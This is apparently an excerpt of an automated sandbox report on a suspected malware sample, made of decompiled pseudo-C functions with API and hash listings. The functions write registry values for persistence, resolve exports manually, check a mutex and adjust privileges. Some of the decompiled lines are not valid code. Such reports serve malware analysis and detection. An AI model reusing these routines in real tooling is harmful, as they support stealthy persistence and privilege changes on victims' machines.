                                                                                                                                                            • Instruction ID: 24b2cfe5d0a1eb091c5885d2f09453389c9ea88171040da3e4bbb7b2210405a6
                                                                                                                                                            • Opcode Fuzzy Hash: 4dfe0a1c26845a9725d4f0e736236785bf6ecb1643ab2190c902e531921a12b8
                                                                                                                                                            • Instruction Fuzzy Hash: E2419FB2C05204BFCB109BB4CE4AFAE77ACEB44315F10826EF51596292E7319B41DB67
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C5588(void* __ecx, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
                                                                                                                                                            				void* _v8;
                                                                                                                                                            				long _t11;
                                                                                                                                                            				int _t19;
                                                                                                                                                            
                                                                                                                                                            				_t19 = 0;
                                                                                                                                                            				_t11 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, 2, 0,  &_v8, 0); // executed
                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                            					RegSetValueExW(_v8, _a12, 0, _a16, _a20, _a24); // executed
                                                                                                                                                            					_t19 =  ==  ? 1 : 0; // executed
                                                                                                                                                            					RegCloseKey(_v8); // executed
                                                                                                                                                            				}
                                                                                                                                                            				return _t19;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            • RegCreateKeyExW.KERNEL32(00000000,009D2140,00000000,00000000,00000000,00000002,00000000,009C18E3,00000000,00000000,?,?,009C2560,80000002,?,?), ref: 009C55A0
                                                                                                                                                            • RegSetValueExW.KERNEL32(009C18E3,?,00000000,00000000,009D2198,?,?,?,009C2560,80000002,?,?,00000003,009D2100,?,009D2198), ref: 009C55BA
                                                                                                                                                            • RegCloseKey.KERNEL32(009C18E3,?,?,009C2560,80000002,?,?,00000003,009D2100,?,009D2198,00000000,?,009D2140,00000000,009C18E3), ref: 009C55CB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseCreateValue
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1818849710-0
                                                                                                                                                            • Opcode ID: 828ace5a1be6ea6c555fe85ba2827747c03568a9fea87b2291eb7dfa7b2485c2
                                                                                                                                                            • Instruction ID: ceda28571d571076a4f486a63cfb1d685b7d44025110c8fb0232e411eaafc410
                                                                                                                                                            • Opcode Fuzzy Hash: 828ace5a1be6ea6c555fe85ba2827747c03568a9fea87b2291eb7dfa7b2485c2
                                                                                                                                                            • Instruction Fuzzy Hash: 02F0DA32652129BBDF255F91DC09DDB7F6DEF0A2A1B004155FA0991020D6328AA0EBE0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C6C30(CHAR* _a4, CHAR* _a8) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                            				struct HINSTANCE__* _t32;
                                                                                                                                                            				signed int _t36;
                                                                                                                                                            				void* _t37;
                                                                                                                                                            				int _t40;
                                                                                                                                                            				signed int _t41;
                                                                                                                                                            				char* _t47;
                                                                                                                                                            				void* _t48;
                                                                                                                                                            				void* _t53;
                                                                                                                                                            				intOrPtr _t57;
                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                            				intOrPtr* _t66;
                                                                                                                                                            				struct HINSTANCE__* _t69;
                                                                                                                                                            
                                                                                                                                                            				E009C707D(0x5e69269d);
                                                                                                                                                            				_t32 = LoadLibraryA(_a4); // executed
                                                                                                                                                            				_t69 = _t32;
                                                                                                                                                            				if(_t69->i == 0x5a4d) {
                                                                                                                                                            					_t66 =  *((intOrPtr*)(_t69 + 0x3c)) + _t69;
                                                                                                                                                            					__eflags =  *_t66 - 0x4550;
                                                                                                                                                            					if( *_t66 == 0x4550) {
                                                                                                                                                            						_t53 =  *((intOrPtr*)(_t66 + 0x78)) + _t69;
                                                                                                                                                            						_v20 =  *((intOrPtr*)(_t53 + 0x1c)) + _t69;
                                                                                                                                                            						_t57 =  *((intOrPtr*)(_t53 + 0x20)) + _t69;
                                                                                                                                                            						_t36 = 0;
                                                                                                                                                            						_v12 = _t57;
                                                                                                                                                            						_v8 = 0;
                                                                                                                                                            						__eflags =  *(_t53 + 0x18);
                                                                                                                                                            						if( *(_t53 + 0x18) <= 0) {
                                                                                                                                                            							L7:
                                                                                                                                                            							_t37 = 0;
                                                                                                                                                            							__eflags = 0;
                                                                                                                                                            							L8:
                                                                                                                                                            							L9:
                                                                                                                                                            							return _t37;
                                                                                                                                                            						} else {
                                                                                                                                                            							goto L5;
                                                                                                                                                            						}
                                                                                                                                                            						while(1) {
                                                                                                                                                            							L5:
                                                                                                                                                            							_v16 =  *((intOrPtr*)(_t53 + 0x24)) + _t69;
                                                                                                                                                            							_t40 = lstrcmpA(_a8,  *((intOrPtr*)(_t57 + _t36 * 4)) + _t69); // executed
                                                                                                                                                            							__eflags = _t40;
                                                                                                                                                            							_t41 = _v8;
                                                                                                                                                            							if(_t40 == 0) {
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							_t57 = _v12;
                                                                                                                                                            							_t36 = _t41 + 1;
                                                                                                                                                            							_v8 = _t36;
                                                                                                                                                            							__eflags = _t36 -  *(_t53 + 0x18);
                                                                                                                                                            							if(_t36 <  *(_t53 + 0x18)) {
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							goto L7;
                                                                                                                                                            						}
                                                                                                                                                            						_t62 =  *((intOrPtr*)(_v20 + ( *(_v16 + _t41 * 2) & 0x0000ffff) * 4));
                                                                                                                                                            						__eflags = _t62 -  *((intOrPtr*)(_t66 + 0x78));
                                                                                                                                                            						if(_t62 <  *((intOrPtr*)(_t66 + 0x78))) {
                                                                                                                                                            							L14:
                                                                                                                                                            							_t37 = _t62 + _t69;
                                                                                                                                                            							goto L8;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t62 -  *((intOrPtr*)(_t66 + 0x7c)) +  *((intOrPtr*)(_t66 + 0x78));
                                                                                                                                                            						if(__eflags >= 0) {
                                                                                                                                                            							goto L14;
                                                                                                                                                            						}
                                                                                                                                                            						_t68 = E009C7388(__eflags, _t62 + _t69);
                                                                                                                                                            						_t47 = E009C60E6(_t46, 0x2e);
                                                                                                                                                            						_t29 = _t47 + 1; // 0x1
                                                                                                                                                            						 *_t47 = 0;
                                                                                                                                                            						_t48 = E009C6C30(_t46, _t29);
                                                                                                                                                            						E009C47F8(_t68);
                                                                                                                                                            						_t37 = _t48;
                                                                                                                                                            						goto L8;
                                                                                                                                                            					}
                                                                                                                                                            					_t37 = 0;
                                                                                                                                                            					goto L9;
                                                                                                                                                            				}
                                                                                                                                                            				return 0;
                                                                                                                                                            			}




















                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: 6f601910cf46e2f672f2dd077d90d02cca42f51f92b810415febc7f3c873f3f0
                                                                                                                                                            • Instruction ID: 5c574e2018d4fccb9c2be3988dcbb2435c883039ca32486cf9e79dfffcb0679d
                                                                                                                                                            • Opcode Fuzzy Hash: 6f601910cf46e2f672f2dd077d90d02cca42f51f92b810415febc7f3c873f3f0
                                                                                                                                                            • Instruction Fuzzy Hash: F1319A70E00104ABCB14EF68CC81F69B7F8EF88300B6044AEE985D7682E775E961DB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C520E(void* __edx) {
                                                                                                                                                            				short _v6;
                                                                                                                                                            				short _v92;
                                                                                                                                                            				intOrPtr _v117;
                                                                                                                                                            				void* _t10;
                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t15;
                                                                                                                                                            
                                                                                                                                                            				_v117 = _v117 + __edx;
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x40e, 8, 0x56,  &_v92);
                                                                                                                                                            				_v6 = 0;
                                                                                                                                                            				_t15 = 0;
                                                                                                                                                            				_t10 = CreateMutexW(0, 0,  &_v92); // executed
                                                                                                                                                            				 *0x9d1d30 = _t10;
                                                                                                                                                            				if(_t10 != 0 && RtlGetLastWin32Error() == 0xb7) {
                                                                                                                                                            					_t15 = 1;
                                                                                                                                                            				}
                                                                                                                                                            				return _t15;
                                                                                                                                                            			}









                                                                                                                                                            APIs
                                                                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 009C523E
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C524D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateErrorLastMutexWin32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 682235734-0
                                                                                                                                                            • Opcode ID: c59187124fb74b97e65ff7c9b031f8475a4378e79e6dc03b9f305816f78e9db5
                                                                                                                                                            • Instruction ID: 94b338ea844e58fa12091e00eaf44ace0c033b09b489d099ca0b0dc2ef487541
                                                                                                                                                            • Opcode Fuzzy Hash: c59187124fb74b97e65ff7c9b031f8475a4378e79e6dc03b9f305816f78e9db5
                                                                                                                                                            • Instruction Fuzzy Hash: EBF020B2E996547ADB10ABF49C06F9B3BACEF51341F014126EE0AE21C0E66084848792
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C520F() {
                                                                                                                                                            				short _v6;
                                                                                                                                                            				short _v92;
                                                                                                                                                            				void* _t8;
                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t11;
                                                                                                                                                            
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x40e, 8, 0x56,  &_v92);
                                                                                                                                                            				_v6 = 0;
                                                                                                                                                            				_t11 = 0;
                                                                                                                                                            				_t8 = CreateMutexW(0, 0,  &_v92); // executed
                                                                                                                                                            				 *0x9d1d30 = _t8;
                                                                                                                                                            				if(_t8 != 0 && RtlGetLastWin32Error() == 0xb7) {
                                                                                                                                                            					_t11 = 1;
                                                                                                                                                            				}
                                                                                                                                                            				return _t11;
                                                                                                                                                            			}








                                                                                                                                                            APIs
                                                                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 009C523E
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C524D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateErrorLastMutexWin32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 682235734-0
                                                                                                                                                            • Opcode ID: ee328d6e7d33df3d1cb11fd705515d2997add5d335f8b08559a9ed577b7f99ae
                                                                                                                                                            • Instruction ID: 125a96b8441e6c18b4803a793f20e4160358a7c32032b0c1a71eadc29d7fa4b2
                                                                                                                                                            • Opcode Fuzzy Hash: ee328d6e7d33df3d1cb11fd705515d2997add5d335f8b08559a9ed577b7f99ae
                                                                                                                                                            • Instruction Fuzzy Hash: 9FF0E5B2E9561877D710ABE49C06F9B77ACEF51741F014122FE0AE21C0EB60D98487E2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                            			E009C4CEB(void* _a4) {
                                                                                                                                                            				void _v8;
                                                                                                                                                            				void* _v12;
                                                                                                                                                            				long _v16;
                                                                                                                                                            				signed int _t17;
                                                                                                                                                            
                                                                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                                                                            				if(OpenProcessToken(_a4, 8,  &_v12) != 0) {
                                                                                                                                                            					_t17 = GetTokenInformation(_v12, 0x12,  &_v8, 4,  &_v16); // executed
                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                            					_v8 = _v8 &  ~_t17;
                                                                                                                                                            					E009C4B21(_v12);
                                                                                                                                                            				}
                                                                                                                                                            				return _v8;
                                                                                                                                                            			}








                                                                                                                                                            APIs
                                                                                                                                                            • OpenProcessToken.ADVAPI32(009C5954,00000008,009C5954,?,009C5954), ref: 009C4CFE
                                                                                                                                                            • GetTokenInformation.KERNELBASE(009C5954,00000012(TokenIntegrityLevel),00000000,00000004,?,?,009C5954), ref: 009C4D17
                                                                                                                                                              • Part of subcall function 009C4B21: FindCloseChangeNotification.KERNEL32(00000000,?,009C7476,00000000,?,009C74D2,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C4B2D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Token$ChangeCloseFindInformationNotificationOpenProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3152771255-0
                                                                                                                                                            • Opcode ID: 8b1527034e6c24f0a5f7eaefd67982e6c30ec4de1649093e8e1f42cd59d8bf2d
                                                                                                                                                            • Instruction ID: fc601fc79c70a4625cba1051e76b776f7eb3607d9a190be7ae2287f66f25da6c
                                                                                                                                                            • Opcode Fuzzy Hash: 8b1527034e6c24f0a5f7eaefd67982e6c30ec4de1649093e8e1f42cd59d8bf2d
                                                                                                                                                            • Instruction Fuzzy Hash: D5F0F876A9420CBBDB10DAE0DD46FEDBBB8EB04702F1040A5BA04E2091D7319F58AB51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C532C(void* __ecx, long _a4) {
                                                                                                                                                            				char _v5;
                                                                                                                                                            				long _t7;
                                                                                                                                                            				long _t11;
                                                                                                                                                            
                                                                                                                                                            				_v5 = 0;
                                                                                                                                                            				_t7 = RtlAdjustPrivilege(_a4, 1, 1,  &_v5);
                                                                                                                                                            				if(_t7 == 0 || _t7 != 0xc000007c) {
                                                                                                                                                            					L4:
                                                                                                                                                            					return 1;
                                                                                                                                                            				} else {
                                                                                                                                                            					_t11 = RtlAdjustPrivilege(_a4, 1, 0,  &_v5); // executed
                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                            						goto L4;
                                                                                                                                                            					}
                                                                                                                                                            					return 0;
                                                                                                                                                            				}
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            • RtlAdjustPrivilege.NTDLL(?,00000001,00000001,?), ref: 009C533F
                                                                                                                                                            • RtlAdjustPrivilege.NTDLL(?,00000001,00000000,00000000), ref: 009C535B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AdjustPrivilege
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3260937286-0
                                                                                                                                                            • Opcode ID: ea1ef623fab48ad4da062b59babce1d2266882b297734d87b22f6149815083e2
                                                                                                                                                            • Instruction ID: 7410dcdcea7048da562e096d5d5518fd18cb0727a5ce358835dbcb3b57a2fb79
                                                                                                                                                            • Opcode Fuzzy Hash: ea1ef623fab48ad4da062b59babce1d2266882b297734d87b22f6149815083e2
                                                                                                                                                            • Instruction Fuzzy Hash: 92E09B32B5C348FBEF205A61DC41FAA375CB7057C0F04446DF905D5190DAE3E5C54551
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C5C8C(char* _a4) {
                                                                                                                                                            				short* _t7;
                                                                                                                                                            				int _t13;
                                                                                                                                                            				short* _t14;
                                                                                                                                                            
                                                                                                                                                            				_t14 = 0;
                                                                                                                                                            				_t13 = MultiByteToWideChar(0, 0, _a4, 0xffffffff, 0, 0);
                                                                                                                                                            				if(_t13 != 0) {
                                                                                                                                                            					_t7 = E009C47AB(_t13 + _t13); // executed
                                                                                                                                                            					_t14 = _t7;
                                                                                                                                                            					if(_t14 != 0 && MultiByteToWideChar(0, 0, _a4, 0xffffffff, _t14, _t13) == 0) {
                                                                                                                                                            						E009C47F8(_t14);
                                                                                                                                                            						_t14 = 0;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				return _t14;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,009C65B6,000000FF,00000000,00000000,?,00000000,?,?,009C65B6,?), ref: 009C5C9F
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,009C65B6,000000FF,00000000,00000000,?,?,009C65B6,?), ref: 009C5CC4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharHeapMultiWide$CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 195641996-0
                                                                                                                                                            • Opcode ID: 417fc28789d5f1bbb6260895ba004ecc8bc955c4486b1040fbe50631365a7184
                                                                                                                                                            • Instruction ID: 984ccbf371d148ce5a78b8e0d1cf3783b4af7d1535fa248b42a154d2ce26d2ae
                                                                                                                                                            • Opcode Fuzzy Hash: 417fc28789d5f1bbb6260895ba004ecc8bc955c4486b1040fbe50631365a7184
                                                                                                                                                            • Instruction Fuzzy Hash: BAF089765456297F67101A796CC4E777B5CD9457F8321032AFD24D2290DA31DC5045A1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                            			E009C1DB3(void* __edx, int* _a4) {
                                                                                                                                                            				char _v8;
                                                                                                                                                            				short _v12;
                                                                                                                                                            				char _v28;
                                                                                                                                                            				short _v30;
                                                                                                                                                            				char _v80;
                                                                                                                                                            				short _v82;
                                                                                                                                                            				char _v396;
                                                                                                                                                            				void* _t29;
                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                            				void* _t39;
                                                                                                                                                            				void* _t46;
                                                                                                                                                            				void* _t53;
                                                                                                                                                            				void* _t55;
                                                                                                                                                            				void* _t57;
                                                                                                                                                            				void* _t58;
                                                                                                                                                            				int* _t59;
                                                                                                                                                            				void* _t60;
                                                                                                                                                            				void* _t62;
                                                                                                                                                            				void* _t63;
                                                                                                                                                            
                                                                                                                                                            				_t58 = __edx;
                                                                                                                                                            				E009C5DE2(0x9d0270, 0xb19, 4, 0x32,  &_v80);
                                                                                                                                                            				_v30 = 0;
                                                                                                                                                            				E009C5DE2(0x9d0270, 0xc82, 9, 0x10,  &_v28);
                                                                                                                                                            				_t59 = _a4;
                                                                                                                                                            				_v12 = 0;
                                                                                                                                                            				_t29 = E009C550A(0x80000002,  &_v80,  &_v28,  &_v8, _t59); // executed
                                                                                                                                                            				_t60 = _t29;
                                                                                                                                                            				_t63 = _t62 + 0x3c;
                                                                                                                                                            				if(_t60 != 0) {
                                                                                                                                                            					L2:
                                                                                                                                                            					if(_v8 == 3) {
                                                                                                                                                            						L8:
                                                                                                                                                            						return _t60;
                                                                                                                                                            					}
                                                                                                                                                            					L3:
                                                                                                                                                            					_t55 = E009C47AB(0x20000);
                                                                                                                                                            					if(_t55 != 0) {
                                                                                                                                                            						E009C5DE2(0x9d0270, 0x71b, 0xb, 0x13a,  &_v396);
                                                                                                                                                            						_v82 = 0;
                                                                                                                                                            						_t35 =  *0x9d2208; // 0x2e3d500
                                                                                                                                                            						 *0x9d126c(_t55, 0x20000,  &_v396, 0x203,  *0x9d21f0,  *0x9d21f4,  *0x9d220c,  *0x9d2210,  *0x9d2214,  *0x9d2218,  *0x9d221c,  *0x9d2220,  *0x9d2224,  *0x9d2228,  *0x9d222c,  *0x9d228c,  *0x9d2230, _t35 + 2);
                                                                                                                                                            						_t39 = E009C6250(_t55);
                                                                                                                                                            						_t57 = _t59;
                                                                                                                                                            						_push(_t39 + _t39);
                                                                                                                                                            						_push(_t55);
                                                                                                                                                            						_push(0x9d0000);
                                                                                                                                                            						_t60 = E009C6B67(_t58);
                                                                                                                                                            						E009C47F8(_t55);
                                                                                                                                                            						if(_t60 == 0) {
                                                                                                                                                            							goto L4;
                                                                                                                                                            						}
                                                                                                                                                            						_t46 = E009C5588(_t57, 0x80000002,  &_v80,  &_v28, 3, _t60,  *_t59); // executed
                                                                                                                                                            						if(_t46 == 0) {
                                                                                                                                                            							E009C5588(_t57, 0x80000001,  &_v80,  &_v28, 3, _t60,  *_t59);
                                                                                                                                                            						}
                                                                                                                                                            						goto L8;
                                                                                                                                                            					}
                                                                                                                                                            					L4:
                                                                                                                                                            					return 0;
                                                                                                                                                            				}
                                                                                                                                                            				_t53 = E009C550A(0x80000001,  &_v80,  &_v28,  &_v8, _t59); // executed
                                                                                                                                                            				_t60 = _t53;
                                                                                                                                                            				_t63 = _t63 + 0x14;
                                                                                                                                                            				if(_t60 == 0) {
                                                                                                                                                            					goto L3;
                                                                                                                                                            				}
                                                                                                                                                            				goto L2;
                                                                                                                                                            			}






















                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c1f28
                                                                                                                                                            0x009c1f32
                                                                                                                                                            0x009c1f46
                                                                                                                                                            0x009c1f4b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c1f32
                                                                                                                                                            0x009c1e55
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c1e55
                                                                                                                                                            0x009c1e2b
                                                                                                                                                            0x009c1e30
                                                                                                                                                            0x009c1e32
                                                                                                                                                            0x009c1e37
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C550A: RegOpenKeyExW.KERNEL32(0000000C,0000000F,00000000,00000001,?,009D0270,00000000,?,?,009C233B,80000002,?,?,?,?,009D0270), ref: 009C5521
                                                                                                                                                              • Part of subcall function 009C550A: RegQueryValueExW.KERNEL32(?,00000A8C,00000000,009D0270,00000000,?,80000002,?,?,009C233B,80000002,?,?,?,?,009D0270), ref: 009C553B
                                                                                                                                                              • Part of subcall function 009C550A: RegQueryValueExW.KERNEL32(?,00000A8C,00000000,009D0270,00000000,?,?,?,009C233B,80000002,?,?,?,?,009D0270,00000A8C), ref: 009C5563
                                                                                                                                                              • Part of subcall function 009C550A: RegCloseKey.KERNEL32(?,?,?,009C233B,80000002,?,?,?,?,009D0270,00000A8C,0000000F,0000000C,?), ref: 009C5579
                                                                                                                                                            • _snwprintf.NTDLL ref: 009C1EE4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: QueryValue$CloseOpen_snwprintf
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 775465768-0
                                                                                                                                                            • Opcode ID: 15593e4df166b180266831fe0154e74ad9797f0193ed234ca67b2ba11470f997
                                                                                                                                                            • Instruction ID: c2917ed80c217e81aeb8399abf654aa5a6b7005070312df62fdacac2e981befb
                                                                                                                                                            • Opcode Fuzzy Hash: 15593e4df166b180266831fe0154e74ad9797f0193ed234ca67b2ba11470f997
